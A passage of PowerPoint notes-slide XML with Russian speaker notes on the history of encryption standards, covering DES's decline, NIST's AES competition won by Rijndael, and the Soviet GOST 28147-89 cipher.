              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>промышленности для защиты информации. В своем исходном виде он уже боль-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ше не является надежным, но в модифицированном виде все еще полезен.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>В какой-то момент стало понятно, что ресурс DES (даже с тройным шифровани-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ем) уже приближается к концу. Тогда Национальный институт стандартов и тех-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>нологий (NIST) — агентство Министерства торговли, занимающееся разработкой</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>стандартов для Федерального правительства США, — решило, что правительству</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>нужен новый криптографический стандарт для несекретных данных. NIST ясно</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>осознавал все противоречия, связанные с DES, и прекрасно понимал, что как</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>только будет объявлено о создании нового стандарта, все, кто хоть что-то смыс-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>лит в криптографической политике, по умолчанию будут предполагать, что и</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>здесь имеется лазейка, с помощью которой Агентство национальной безопасно-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сти с легкостью сможет расшифровывать любую информацию. На таких услови-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ях вряд ли кто-то согласится применять у себя новую технологию, и она, скорее</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>всего, так и умрет в безвестности.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Исходя из этих предпосылок, институт стандартов и технологий применил</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>неожиданный для правительственного бюрократического аппарата подход: он ре-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>шил просто спонсировать криптографический конкурс. В январе 1997 года уче-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ные со всего мира были приглашены для представления своих разработок, касаю-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>щихся нового стандарта, который назвали AES (Advanced Encryption Standard —</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>улучшенный стандарт шифрования). </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Было рассмотрено 15 серьезных предложений.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>На последней конференции было проведено независимое голосование и уже в ноябре 2001 года</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>победитель - алгоритм Rijndael становится стандартом правительства США. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rijndael (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Джон Домен </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Qohn Daemen) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>и Винсент Раймен (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Vincent Rijmen)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>С математической точки зрения, метод Rijndael основывается на теории полей</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Галуа, благодаря чему можно строго доказать некоторые его свойства, касающие-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ся секретности.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ГОСТ 28147—89 — советский и российский стандарт симметричного шифрования, введённый в 1990 году. Полное название — «ГОСТ 28147—89 Системы обработки информации. Защита криптографическая. Алгоритм криптографического преобразования». Блочный шифроалгоритм. При использовании метода шифрования с гаммированием, может выполнять функции поточного шифроалгоритма.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>По некоторым сведениям[1], история этого шифра гораздо более давняя. Алгоритм, положенный впоследствии в основу стандарта, родился, предположительно, в недрах Восьмого Главного управления КГБ СССР (ныне в структуре ФСБ), скорее всего, в одном из подведомственных ему закрытых НИИ, вероятно, ещё в 1970-х годах в рамках проектов создания программных и аппаратных реализаций шифра для различных компьютерных платформ.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>С момента опубликования ГОСТа на нём стоял ограничительный гриф «Для служебного пользования», и формально шифр был объявлен «полностью открытым» только в мае 1994 года. К сожалению, история создания шифра и критерии разработчиков до сих пор не опубликованы.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
